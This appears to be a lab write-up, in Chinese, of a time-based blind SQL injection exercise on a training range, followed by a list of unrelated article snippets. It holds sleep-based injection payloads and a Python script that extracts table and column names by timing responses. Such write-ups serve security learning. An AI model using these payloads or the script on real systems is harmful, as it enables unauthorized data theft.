chick&
chick&

sql(时间盲注)——墨者学院——漏洞操作记录

Sql时间盲注

1、 开始的页面,但是不是这个页面,点击下面的任性网页

sql(时间盲注)——墨者学院——漏洞操作记录_第1张图片

sql(时间盲注)——墨者学院——漏洞操作记录_第2张图片

2、提示再url中传参,加个逗号 ?type=1’

sql(时间盲注)——墨者学院——漏洞操作记录_第3张图片

既然提示是时间盲注,那就

?type=1’ and sleep(5)%23

没有时间延迟

去掉单引号

有时间延迟5秒

sql(时间盲注)——墨者学院——漏洞操作记录_第4张图片

因为是时间延迟,没有任何回显,那只能用python写脚本或者用sqlmap

这里是脚本,但是后面有错误,我找不到原因,只能查到flag、goods表的字段

import requests import datetime import time session = requests.Session() session.keep_alive = False # requests默认使用urllib3库,默认是长连接,改为false,关闭多余的连接 requests.adapters.DEFAULT_RETRIES = 8 # 设置重连次数,防止线程数过高,断开连接 def lenStr(name): for i in range(100): url = "http://219.153.49.228:44261/flag.php?type=1" payload = " and if(length("+str(name)+")="+str(i)+",sleep(2),1)" time1 = datetime.datetime.now() print(url+payload+'%23') r = session.get(url+payload+'%23') time2 = datetime.datetime.now() sec = (time2 - time1).seconds if sec > 1.5: print(str(name)+" len is %d" % i) return i global database_name def database(): name = 'database()' lenDB = lenStr(name) database_name = '' for i in range(1, lenDB+1): for j in '0123456789abcdefghijklmnopqrstuvwxyz': url = "http://219.153.49.228:44261/flag.php?type=1" payload = " and if(substr(database(),%d,1)='%s',sleep(2),1)" % (i, j) print(url+payload+"%23") time1 = datetime.datetime.now() r = session.get(url=url+payload+'%23') time2 = datetime.datetime.now() sec = (time2 - time1).seconds if sec > 1.5: database_name += j print("database:"+database_name) break def table(): global table_name table_name = '' name = "(select group_concat(table_name) from information_schema.tables where table_schema=database())" lenTB = lenStr(name) for i in range(lenTB+1): for j in '0123456789abcdefghijklmnopqrstuvwxyz,./`?<>-_=+~!@#$%^&*()': url = "http://219.153.49.228:44261/flag.php?type=1" payload = " and if(substr("+name+","+str(i)+",1)='"+j+"',sleep(2),1)" print(url+payload+"%23") time1 = datetime.datetime.now() r = session.get(url+payload+"%23") time2 = datetime.datetime.now() sec = (time2 - time1).seconds if sec > 1.5: table_name += j print("table:"+table_name) break def column(): global column_name column_name = '' list = table_name.split(",", -1) for TB in list: name = "(select group_concat(column_name) from information_schema.columns where table_name='"+TB+"')" lenCL = lenStr(name) for i in range(lenCL): for j in '0123456789abcdefghijklmnopqrstuvwxyz,./`?<>-_=+~!@#$%^&*()': url = "http://219.153.49.228:44261/flag.php?type=1" payload = " and if(substr("+name+","+str(i)+",1)='"+j+"',sleep(2),1)" print(url + payload + "%23") time1 = datetime.datetime.now() r = session.get(url + payload + "%23") time2 = datetime.datetime.now() sec = (time2 - time1).seconds if sec > 1.5: column_name += j print("table:"+TB+"ncolumn:"+column_name) break if __name__ == '__main__': #database() table() column()

还是用sqlmap扫把

sql(时间盲注)——墨者学院——漏洞操作记录_第5张图片

sql(时间盲注)——墨者学院——漏洞操作记录_第6张图片

爆数据库

sql(时间盲注)——墨者学院——漏洞操作记录_第7张图片

sql(时间盲注)——墨者学院——漏洞操作记录_第8张图片

爆表

sql(时间盲注)——墨者学院——漏洞操作记录_第9张图片

爆字段

sql(时间盲注)——墨者学院——漏洞操作记录_第10张图片

爆值

sql(时间盲注)——墨者学院——漏洞操作记录_第11张图片

回到第一个页面

sql(时间盲注)——墨者学院——漏洞操作记录_第12张图片

技术重点:时间盲注无回显,只能靠sleep判断。

手工注入:需猜表名等等,比较麻烦。考验基础。

你可能感兴趣的:(漏洞/靶场操作记录,安全漏洞)

  • 什么是域名劫持?如何防止域名劫持? sslhttps
    什么是域名劫持?如何防止域名劫持?域名劫持(DomainHijacking)是一种网络攻击手段,攻击者通过非法手段获取域名的控制权,将用户的访问请求重定向到恶意网站。这种行为不仅会导致用户隐私泄露,还可能对企业的品牌形象和业务造成严重损害。域名劫持的常见方式包括窃取域名注册商账户信息、利用社会工程学攻击、或通过DNS服务器漏洞实施攻击。域名劫持的危害用户隐私泄露:用户被引导至恶意网站,可能导致个人
  • OpenVAS 工具使用全攻略 垚垚 Securify 前沿站 网络
    目录一、引言二、安装OpenVAS2.1准备工作2.2Ubuntu系统安装步骤2.3CentOS系统安装步骤三、配置OpenVAS3.1初始化OpenVAS3.2设置管理员密码3.3启动服务四、使用OpenVAS进行扫描4.1登录Web界面4.2创建扫描任务4.3启动扫描4.4查看扫描结果五、结果分析与处理5.1风险等级评估5.2漏洞修复建议六、总结一、引言OpenVAS(OpenVulnerab
  • 信息安全之网络安全 黑客Jack web安全安全
    网络安全技术是一类包含内容极其广泛的技术,广义上说任何检测、防御和抵制网络攻击的技术都属于网络安全技术,而且很多网络安全技术都是攻击驱动型的。网络安全大致包含的内容主要有防火墙,入侵检测,漏洞扫描与网络隔离,拒绝服务攻击检测与防御,计算机病毒防治以及×××技术的概念、原理、应用部署等方面。防火墙防火墙是设置在内部网络与外部网络(如互联网)之间,实施访问控制策略的一个或者一组系统,是访问控制机制在网
  • 工控网络安全学习路线 206333308 安全
    一、基础技能编程语言:从汇编语言开始学习,了解底层机器指令和内存管理等基础知识。接着学习C/C++,掌握面向过程和面向对象编程的基本概念和技术,为后续的漏洞挖掘和底层分析打下基础。最后学习Python,它在安全领域应用广泛,可用于自动化脚本编写、漏洞扫描和数据分析等。《计算机网络原理》:掌握网络通信的基本原理,包括OSI七层模型、TCP/IP协议栈、IP地址分配、子网掩码等。了解网络拓扑结构、路由
  • 在软件产品从开发到上线过程中,不同阶段可能出现哪些问题,导致软件最终出现线上bug 测试-东方不败之鸭梨 测试基础bug数据库
    在软件产品从开发到上线的全生命周期中,不同阶段都可能因流程漏洞、技术疏忽或人为因素导致线上问题。以下是各阶段常见问题及典型案例:1.需求分析与设计阶段问题根源:业务逻辑不清晰或设计缺陷典型问题:需求文档模糊(如未明确定义边界条件或异常场景)架构设计不合理(如单点故障、未考虑高并发场景)技术选型与业务场景不匹配(如用Redis缓存静态数据但未设置TTL)案例:支付接口未设计幂等性,导致用户重复点击时
  • 文件安全审计:追踪与监控数据访问行为的利器 够快云库 企业数据安全企业文件安全
    随着企业数据资产的不断增长,文件安全已成为企业面临的重大挑战之一。无论是外部威胁还是内部操作失误,都可能导致敏感数据的泄露、篡改甚至丢失。因此,企业不仅需要有效的安全防护措施,还应具备强大的追踪与监控能力,以确保任何对文件的访问和操作行为都在安全控制之下。在这种背景下,文件安全审计成为企业管理中至关重要的工具,它为企业提供了全面的文件操作记录,帮助及时发现并应对潜在的安全威胁。1.文件安全审计的核
  • 如何避免redis长期运行持久化AOF文件过大的问题:AOF重写 学会了没 redisaofAOF重写
    一、AOF重写的核心作用通过重建AOF文件,解决以下问题:体积压缩:消除冗余命令(如多次修改同一key),生成最小操作集合。混合持久化支持(若启用aof-use-rdb-preambleyes):生成RDB头部+增量AOF命令。数据一致性:确保AOF文件仅包含有效数据集的完整操作记录。二、触发AOF重写的方式1.自动触发通过redis.conf配置触发条件:auto-aof-rewrite-per
  • 网络安全入门信息收集与漏洞扫描(二) 挣扎与觉醒中的技术人 网络安全入门及实战web安全网络安全c++程序人生
    主动信息收集1Nmap扫描端口与服务(1)Nmap是什么?定义:网络探测工具,用于扫描开放端口、识别服务及操作系统。典型用途:发现目标存活主机(ping扫描)。识别开放端口和运行的服务(如SSH、HTTP、数据库)。探测操作系统类型(Windows/Linux)。(2)基础扫描命令快速扫描常用端口:nmap-sV-T4192.168.1.100#-sV探测服务版本,-T4加速扫描示例输出:PORT
  • 9 个构建安全 PHP 应用的开发技巧 程序员阿凡提 PHP实战教程php
    在软件开发的征程中,即便是那些身经百战、经验极为丰富的开发人员,也难免会遭遇种种始料未及的棘手挑战。有时,源自第三方API的数据格式混乱不堪,完全偏离预期;又或是用户输入一些稀奇古怪、让人摸不着头脑的字符串,令人防不胜防;还有可能隐藏着悄然引发安全漏洞的故障,在暗处伺机而动,给整个项目带来巨大风险。而在以灵活性著称、广受开发者青睐的PHP语言环境里,将安全性置于首位绝非可有可无的附加项,它实实在在
  • Redis之父学生时代发现的ping漏洞的源码分析
    Redis的作者SalvatoreSanfilippo(网名antirez)在意大利西西里岛长大,虽然从小就接触计算机,也有一些编程经验,但在大学期间却选择了建筑学院,可能当时并没有打算走职业程序员的道路吧。然而antirez应该就属于老天爷赏饭的那类人,据说仅仅因为错把显卡买成了网卡,商家又不肯退货,他就放下游戏,拿起了C语言的教材。不久之后,antirez发现了一个ping的漏洞,非root用
  • shiro 反序列化漏洞解决方案 小明同学哦 1024程序员节
    问题版本shiro1.2.4官方默认key:kPH+bIxk5D2deZiIxcaaaA==获取相关信息解决方案:升级到更新版本:1.3.0兼容jdk1.7检测工具:shiro_attack-4.7.0-SNAPSHOT-all.zip
  • WEB漏洞-XXE&XML之利用检测绕过 网小白白 xmljavaphpweb网络安全
    XXE"xmlexternalentityinjection"-XML外部实体注入漏洞服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入xml基本语法XML被设计用来结构化、存储以及传输信息;恰恰相反,HTML是被设计用来显示数据,其焦点是数据的外观。XML没有预定义的标签。它仅仅是纯文本而已。有能力处理纯文本的软件都可以处理XML。XML不会做任何事情
  • 红队视角出发的k8s敏感信息收集——持久化存储与数据泄露 周周的奇妙编程 kubernetes容器云原生
    在Kubernetes集群中,持久化存储卷如同数据的保险箱,承载着应用运行所必需的各类敏感信息。然而,从红队视角出发,这些存储卷也可能成为攻击者觊觎的目标。通过巧妙地利用配置不当或已知漏洞,攻击者能够从中收集到包括密钥、访问凭证在内的大量敏感数据,进而导致数据泄露事件的发生。攻击链示例:攻击者通过容器逃逸进入Pod→发现挂载的EBS卷并创建快照→共享快照至攻击者AWS账户→还原快照窃取数据库凭据→
  • 每天一篇逻辑漏洞 不灭锦鲤 学习
    前言:水一篇文章,今天也没有去挖洞内容:学了那么多了,还没有长进,是不是我的学习方法有问题但是到底哪里有问题呢,我又不知道,我好像好久没有总结了,应该写一篇日记,然后总结的一篇文章,然后把日记的内容丢里面,感觉就挺好了,就不用去找文章了好了就这样,进入正题好了,今天学会伪造了jsonp的xss,就是说是json格式的话,不是jsonp格式,可以尝试在url后面加上callback,看是否有返回值
  • Vulhub靶机 ActiveMQ 反序列化漏洞(CVE-2015-5254)(渗透测试详解) 芜丶湖 activemqweb安全安全性测试linux网络系统安全
    一、开启vulhub环境docker-composeup-d启动dockerps查看开放的端口漏洞版本:ApacheActiveMQ5.x~ApacheActiveMQ5.13.0二、访问靶机IP8161端口默认账户密码admin/admin,登录此时qucues事件为空1、使用jmet-0.1.0-all.jar工具将有效负载发送到目标IP的61616端口jmet原理是使用ysoserial生成
  • 网络安全---SQL注入攻击 犹若故人归 网络数据库postgresqlweb安全docker安全sql
    一、实验目的SQL注入是一种代码注入技术,可利用Web应用程序和数据库服务器之间接口中的漏洞。当用户的输入在发送到后端数据库服务器之前未在Web应用程序中正确检查时,该漏洞就存在。许多Web应用程序从用户处获取输入,然后使用这些输入构建SQL查询,以便从数据库获取信息。Web应用程序还使用SQL查询将信息存储在数据库中。这些都是开发Web应用程序的常见做法。当SQL查询没有仔细构建时,可能会出现S
  • 溯源-如何还原攻击路径 C Aires 网络安全之溯源一网络安全网络网络协议
    溯源-如何还原攻击路径1.web入侵流程2.windows-还原攻击路径3.linux-还原攻击路径1.web入侵流程信息收集->漏洞扫描->渗透攻击->提权->后渗透->持续控制2.windows-还原攻击路径日志分析web日志存在位置:1.默认安装位置的logs文件夹下/2.tomcat日志catalina.out(引擎的日志文件)、localhost(内部代码丢出的日志)、manager(应
  • 筑墙扫漏检入侵网安三叉戟出阵 Liana-Fany 安全web安全网络
    20世纪90年代中期,在互联网迅速发展时期的网络对抗格局中,“攻”的力量大致可以分成两类:一类是大量低层次、低技术、破坏性的攻击者,包括“脚本小子”;另一类是一小群深入研究、发现漏洞的技术高手。“防”的力量始终比较薄弱,没有得到相应的加强。各个机构的计算机和网络的安全防护方案,基本上停留在防火墙这种单一的手段上。而在万维网普及、TCP/IP协议的大量漏洞被公开之后,防火墙这种简单易行,但却有些一刀
  • 网络安全-攻击流程-传输层 星河776(重名区分) 网络安全web安全安全学习
    传输层攻击主要针对OSI模型的第四层,涉及TCP和UDP协议的安全漏洞。以下是常见攻击类型及其流程,以及防御措施:1.SYN洪水攻击(TCP半连接攻击)攻击流程:目标选择:确定目标服务器的IP地址和开放端口。伪造请求:攻击者伪造大量虚假源IP地址,向目标发送TCPSYN包。资源消耗:服务器为每个SYN分配资源(如连接表条目),并回复SYN-ACK包到伪造IP。连接未完成:因伪造IP无响应,服务器持
  • XSS攻击全貌:原理、分类、检测与防御策略研究 键盘侠伍十七 web安全xss网络服务器web安全XSS攻击
    XSS攻击原理的深入剖析跨站脚本攻击(Cross-SiteScripting,简称XSS)作为一种广泛存在的web应用程序安全漏洞,其机制在于利用了客户端与服务器之间数据交换过程中的信任链被恶意破坏。该类攻击的核心原理是攻击者通过向Web应用程序注入精心构造的、能够在受害者浏览器环境下执行的恶意脚本代码。这些注入的脚本在用户无意识的情况下被执行,不仅能够非法获取用户的cookies、session
  • Memcached服务器UDP反射放大攻击 weixin_30639719 memcached网络操作系统
    1、前言2月28日,Memcache服务器被曝出存在UDP反射放大攻击漏洞。攻击者可利用这个漏洞来发起大规模的DDoS攻击,从而影响网络正常运行。漏洞的形成原因为Memcache服务器UDP协议支持的方式不安全、默认配置中将UDP端口暴露给外部链接。2、原理分析这个漏洞的攻击方式属于DRDOS(DistributedReflectionDenialofService)分布式反射拒绝服务攻击。DRD
  • 网络安全-攻击流程-网络层 星河776(重名区分) 网络安全web安全php安全网络安全
    网络层攻击主要针对OSI模型中的第三层(网络层),涉及IP协议、路由机制等核心功能。攻击者通过操纵数据包、路由信息或协议漏洞实施破坏。以下是典型的网络层攻击流程及防御方法:一、网络层攻击通用流程1.信息收集(Reconnaissance)目标扫描:使用工具(如nmap、hping3)扫描目标IP范围,识别活跃主机和开放端口。路由追踪:通过traceroute或tracert探测网络路径,分析路由拓
  • python——脚本实现检测目标ip是否存在文件包含漏洞 xiaochuhe--kaishui Python爬虫漏洞挖掘pythontcp/ip安全
    python爬虫——request模块(一)_xiaochuhe的博客-CSDN博客_pythonrequestpython——正则表达式(一)_xiaochuhe的博客-CSDN博客举例dvwa——FileInclusion代码如下:importrequestsimportreurl=input("请输入需要检测的网址:&#
  • #最新#2025年护网#蓝队防守必须排查的57个安全漏洞与解决方案 (上) 独行soc 2025年护网安全web安全面试漏洞挖掘文件读取漏洞2025年护网
    免责声明本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章读。目录一、OA系统泛微(Weaver-Ecology-OA)致远(Seeyon)通达OA(TongDaOA)二、E-mailExchangeCoremail三、Web中间件ApacheWeblo
  • 一文读懂 Windows 逆向工程中的滑板指令 阿贾克斯的黎明 C++单片机嵌入式硬件
    目录一文读懂Windows逆向工程中的滑板指令一、滑板指令是什么二、滑板指令在软件破解中的应用场景三、实战演示:用滑板指令破解密码验证程序四、滑板指令的其他用途五、总结与作业在Windows逆向工程领域,滑板指令(NOP指令,即No-Operation的缩写)是一项极为实用的技术,对于软件安全工程师而言,熟练掌握它,就如同掌握了一把开启软件破解与漏洞利用大门的钥匙。今天,就来带大家深入探索滑板指令
  • sendmessage WM_PAINT 无效(6月19日) Randyqiu VC/MFCapplicationsystemfunctionprocessingeachbutton
    今天意外发现替一哥们做的程序还有漏洞,点击弹出来的对话框的BUTTON时,发现主窗口(实际是VIEW啦)不自动重绘以产生相应图形。我就纳闷了,我明明已经给VIEW类发送WM_PAINT重绘消息了啊,怎么回事?搜索MSDN,发现以下一段话:TheWM_PAINTmessageisgeneratedbythesystemandshouldnotbesentbyanapplication.Toforce
  • 人生建议往死里学网络安全!零基础也能跨行学习!!漏洞挖掘还能做副业 ~小羊没烦恼~ web安全学习网络服务器安全
    一、网络安全的重要性:从‘不学会被黑’到‘学会保护别人’网络安全的概念现在不再是技术圈的独立话题,它已经渗透到社会的各个领域。从个人的隐私保护、企业的数据安全,到国家的信息防护,网络安全几乎影响了每一个人的生活。无论是黑客攻击、勒索病毒、数据泄露,还是国家间的信息战,网络安全已经成为现代社会的基础设施之一。所以,首先要明白学习网络安全的重要性:你不仅是在学习技术,更多的是在为自己和他人的安全“筑城
  • c#自动更新-源码 未来之窗软件服务 c#服务器网络
    软件维护与升级修复漏洞和缺陷:软件在使用过程中可能会发现各种漏洞和缺陷,自动更新可以及时推送修复程序,增强软件的稳定性和安全性,避免因漏洞被利用而导致数据泄露、系统崩溃等问题。提升性能:通过自动更新,可以对软件的算法、代码逻辑等进行优化,提高软件的运行效率,减少资源占用,让软件运行得更加流畅。添加新功能:随着业务的发展和用户需求的变化,软件需要不断添加新功能来满足用户。自动更新能够方便地将新功能推
  • 浏览器安全学习 Shanfenglan7 安全学习
    浏览器特性会将一些特殊符号当做字母进行解析,此时一个符号可能会被解析成两个到三个字母,这样子如果有漏洞对输入做了限制,黑客就可以利用这个特性来绕过某些漏洞中长度限制。某些特殊字符或者其他国家的文字和某些字母的形状一模一样,也有可能会被黑客用来伪造域名。不过现在已经不支持其他国家的文字和英文在一起来注册域名了。浏览器的输入框可以直接输入账号密码登录服务器,此时可以构造特殊的账号密码,来迷惑用户让其以
  • Web应用安全威胁与防护措施 星环之光 网络安全网络web安全
    本文已收录至《全国计算机等级考试——信息安全技术》专栏由于极其容易出现漏洞、并引发安全事故,因此数据隐私的保护是目前绝大多数企业不可绕过的运维环节。不过,许多中小型企业往往会错误地认为只有大型企业才会成为黑客的目标。而实际统计数字却截然不同:有43%的网络犯罪恰恰是针对小型企业的。而且,无论是系统陈旧且未给漏洞打上安全补丁,还是各种恶意软件,甚至是一些人为的错误,都可以成为系统的受攻击面。如果仔细
  • Java常用排序算法/程序员必须掌握的8大排序算法 cugfy java
    分类: 1)插入排序(直接插入排序、希尔排序) 2)交换排序(冒泡排序、快速排序) 3)选择排序(直接选择排序、堆排序) 4)归并排序 5)分配排序(基数排序) 所需辅助空间最多:归并排序 所需辅助空间最少:堆排序 平均速度最快:快速排序 不稳定:快速排序,希尔排序,堆排序。 先来看看8种排序之间的关系:   1.直接插入排序 (1
  • 【Spark102】Spark存储模块BlockManager剖析 bit1129 manager
    Spark围绕着BlockManager构建了存储模块,包括RDD,Shuffle,Broadcast的存储都使用了BlockManager。而BlockManager在实现上是一个针对每个应用的Master/Executor结构,即Driver上BlockManager充当了Master角色,而各个Slave上(具体到应用范围,就是Executor)的BlockManager充当了Slave角色
  • linux 查看端口被占用情况详解 daizj linux端口占用netstatlsof
    经常在启动一个程序会碰到端口被占用,这里讲一下怎么查看端口是否被占用,及哪个程序占用,怎么Kill掉已占用端口的程序   1、lsof -i:port port为端口号   [root@slave /data/spark-1.4.0-bin-cdh4]# lsof -i:8080 COMMAND   PID USER   FD   TY
  • Hosts文件使用 周凡杨 hostslocahost
         一切都要从localhost说起,经常在tomcat容器起动后,访问页面时输入http://localhost:8088/index.jsp,大家都知道localhost代表本机地址,如果本机IP是10.10.134.21,那就相当于http://10.10.134.21:8088/index.jsp,有时候也会看到http: 127.0.0.1:
  • java excel工具 g21121 Java excel
    直接上代码,一看就懂,利用的是jxl: import java.io.File; import java.io.IOException; import jxl.Cell; import jxl.Sheet; import jxl.Workbook; import jxl.read.biff.BiffException; import jxl.write.Label; import
  • web报表工具finereport常用函数的用法总结(数组函数) 老A不折腾 finereportweb报表函数总结
    ADD2ARRAY ADDARRAY(array,insertArray, start):在数组第start个位置插入insertArray中的所有元素,再返回该数组。 示例: ADDARRAY([3,4, 1, 5, 7], [23, 43, 22], 3)返回[3, 4, 23, 43, 22, 1, 5, 7]. ADDARRAY([3,4, 1, 5, 7], "测试&q
  • 游戏服务器网络带宽负载计算 墙头上一根草 服务器
    家庭所安装的4M,8M宽带。其中M是指,Mbits/S 其中要提前说明的是: 8bits = 1Byte 即8位等于1字节。我们硬盘大小50G。意思是50*1024M字节,约为 50000多字节。但是网宽是以“位”为单位的,所以,8Mbits就是1M字节。是容积体积的单位。 8Mbits/s后面的S是秒。8Mbits/s意思是 每秒8M位,即每秒1M字节。 我是在计算我们网络流量时想到的
  • 我的spring学习笔记2-IoC(反向控制 依赖注入) aijuans Spring 3 系列
    IoC(反向控制 依赖注入)这是Spring提出来了,这也是Spring一大特色。这里我不用多说,我们看Spring教程就可以了解。当然我们不用Spring也可以用IoC,下面我将介绍不用Spring的IoC。 IoC不是框架,她是java的技术,如今大多数轻量级的容器都会用到IoC技术。这里我就用一个例子来说明: 如:程序中有 Mysql.calss 、Oracle.class 、SqlSe
  • 高性能mysql 之 选择存储引擎(一) annan211 mysqlInnoDBMySQL引擎存储引擎
    1 没有特殊情况,应尽可能使用InnoDB存储引擎。   原因:InnoDB 和 MYIsAM 是mysql 最常用、使用最普遍的存储引擎。其中InnoDB是最重要、最广泛的存储引擎。她   被设计用来处理大量的短期事务。短期事务大部分情况下是正常提交的,很少有回滚的情况。InnoDB的性能和自动崩溃   恢复特性使得她在非事务型存储的需求中也非常流行,除非有非常
  • UDP网络编程 百合不是茶 UDP编程局域网组播
      UDP是基于无连接的,不可靠的传输   与TCP/IP相反       UDP实现私聊,发送方式客户端,接受方式服务器 package netUDP_sc; import java.net.DatagramPacket; import java.net.DatagramSocket; import java.net.Ine
  • JQuery对象的val()方法执行结果分析 bijian1013 JavaScriptjsjquery
            JavaScript中,如果id对应的标签不存在(同理JAVA中,如果对象不存在),则调用它的方法会报错或抛异常。在实际开发中,发现JQuery在id对应的标签不存在时,调其val()方法不会报错,结果是undefined。        
  • http请求测试实例(采用json-lib解析) bijian1013 jsonhttp
            由于fastjson只支持JDK1.5版本,因些对于JDK1.4的项目,可以采用json-lib来解析JSON数据。如下是http请求的另外一种写法,仅供参考。 package com; import java.util.HashMap; import java.util.Map; import
  • 【RPC框架Hessian四】Hessian与Spring集成 bit1129 hessian
    在【RPC框架Hessian二】Hessian 对象序列化和反序列化一文中介绍了基于Hessian的RPC服务的实现步骤,在那里使用Hessian提供的API完成基于Hessian的RPC服务开发和客户端调用,本文使用Spring对Hessian的集成来实现Hessian的RPC调用。   定义模型、接口和服务器端代码 |---Model    &nb
  • 【Mahout三】基于Mahout CBayes算法的20newsgroup流程分析 bit1129 Mahout
    1.Mahout环境搭建  1.下载Mahout http://mirror.bit.edu.cn/apache/mahout/0.10.0/mahout-distribution-0.10.0.tar.gz    2.解压Mahout  3. 配置环境变量 vim /etc/profile export HADOOP_HOME=/home
  • nginx负载tomcat遇非80时的转发问题 ronin47
      nginx负载后端容器是tomcat(其它容器如WAS,JBOSS暂没发现这个问题)非80端口,遇到跳转异常问题。解决的思路是:$host:port        详细如下:    该问题是最先发现的,由于之前对nginx不是特别的熟悉所以该问题是个入门级别的: ? 1 2 3 4 5
  • java-17-在一个字符串中找到第一个只出现一次的字符 bylijinnan java
    public class FirstShowOnlyOnceElement { /**Q17.在一个字符串中找到第一个只出现一次的字符。如输入abaccdeff,则输出b * 1.int[] count:count[i]表示i对应字符出现的次数 * 2.将26个英文字母映射:a-z <--> 0-25 * 3.假设全部字母都是小写 */ pu
  • mongoDB 复制集 开窍的石头 mongodb
    mongo的复制集就像mysql的主从数据库,当你往其中的主复制集(primary)写数据的时候,副复制集(secondary)会自动同步主复制集(Primary)的数据,当主复制集挂掉以后其中的一个副复制集会自动成为主复制集。提供服务器的可用性。和防止当机问题             mo
  • [宇宙与天文]宇宙时代的经济学 comsci 经济
        宇宙尺度的交通工具一般都体型巨大,造价高昂。。。。。      在宇宙中进行航行,近程采用反作用力类型的发动机,需要消耗少量矿石燃料,中远程航行要采用量子或者聚变反应堆发动机,进行超空间跳跃,要消耗大量高纯度水晶体能源      以目前地球上国家的经济发展水平来讲,
  • Git忽略文件 Cwind git
         有很多文件不必使用git管理。例如Eclipse或其他IDE生成的项目文件,编译生成的各种目标或临时文件等。使用git status时,会在Untracked files里面看到这些文件列表,在一次需要添加的文件比较多时(使用git add . / git add -u),会把这些所有的未跟踪文件添加进索引。 ==== ==== ==== 一些牢骚
  • MySQL连接数据库的必须配置 dashuaifu mysql连接数据库配置
    MySQL连接数据库的必须配置   1.driverClass:com.mysql.jdbc.Driver   2.jdbcUrl:jdbc:mysql://localhost:3306/dbname   3.user:username   4.password:password   其中1是驱动名;2是url,这里的‘dbna
  • 一生要养成的60个习惯 dcj3sjt126com 习惯
    一生要养成的60个习惯 第1篇 让你更受大家欢迎的习惯 1 守时,不准时赴约,让别人等,会失去很多机会。 如何做到: ①该起床时就起床, ②养成任何事情都提前15分钟的习惯。 ③带本可以随时阅读的书,如果早了就拿出来读读。 ④有条理,生活没条理最容易耽误时间。 ⑤提前计划:将重要和不重要的事情岔开。 ⑥今天就准备好明天要穿的衣服。 ⑦按时睡觉,这会让按时起床更容易。 2 注重
  • [介绍]Yii 是什么 dcj3sjt126com PHPyii2
    Yii 是一个高性能,基于组件的 PHP 框架,用于快速开发现代 Web 应用程序。名字 Yii (读作 易)在中文里有“极致简单与不断演变”两重含义,也可看作 Yes It Is! 的缩写。 Yii 最适合做什么? Yii 是一个通用的 Web 编程框架,即可以用于开发各种用 PHP 构建的 Web 应用。因为基于组件的框架结构和设计精巧的缓存支持,它特别适合开发大型应
  • Linux SSH常用总结 eksliang linux sshSSHD
    转载请出自出处:http://eksliang.iteye.com/blog/2186931 一、连接到远程主机   格式: ssh name@remoteserver 例如: ssh [email protected]   二、连接到远程主机指定的端口   格式: ssh name@remoteserver -p 22 例如: ssh i
  • 快速上传头像到服务端工具类FaceUtil gundumw100 android
    快速迭代用 import java.io.DataOutputStream; import java.io.File; import java.io.FileInputStream; import java.io.FileNotFoundException; import java.io.FileOutputStream; import java.io.IOExceptio
  • jQuery入门之怎么使用 ini JavaScripthtmljqueryWebcss
    jQuery的强大我何问起(个人主页:hovertree.com)就不用多说了,那么怎么使用jQuery呢?   首先,下载jquery。下载地址:http://hovertree.com/hvtart/bjae/b8627323101a4994.htm,一个是压缩版本,一个是未压缩版本,如果在开发测试阶段,可以使用未压缩版本,实际应用一般使用压缩版本(min)。然后就在页面上引用。
  • 带filter的hbase查询优化 kane_xie 查询优化hbaseRandomRowFilter
    问题描述 hbase scan数据缓慢,server端出现LeaseException。hbase写入缓慢。   问题原因 直接原因是: hbase client端每次和regionserver交互的时候,都会在服务器端生成一个Lease,Lease的有效期由参数hbase.regionserver.lease.period确定。如果hbase scan需
  • java设计模式-单例模式 men4661273 java单例枚举反射IOC
             单例模式1,饿汉模式 //饿汉式单例类.在类初始化时,已经自行实例化 public class Singleton1 { //私有的默认构造函数 private Singleton1() {} //已经自行实例化 private static final Singleton1 singl
  • mongodb 查询某一天所有信息的3种方法,根据日期查询 qiaolevip 每天进步一点点学习永无止境mongodb纵观千象
    // mongodb的查询真让人难以琢磨,就查询单天信息,都需要花费一番功夫才行。 // 第一种方式: coll.aggregate([ {$project:{sendDate: {$substr: ['$sendTime', 0, 10]}, sendTime: 1, content:1}}, {$match:{sendDate: '2015-
  • 二维数组转换成JSON tangqi609567707 java二维数组json
    原文出处:http://blog.csdn.net/springsen/article/details/7833596 public class Demo {     public static void main(String[] args) {        String[][] blogL
  • erlang supervisor wudixiaotie erlang
    定义supervisor时,如果是监控celuesimple_one_for_one则删除children的时候就用supervisor:terminate_child (SupModuleName, ChildPid),如果shutdown策略选择的是brutal_kill,那么supervisor会调用exit(ChildPid, kill),这样的话如果Child的behavior是gen_
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他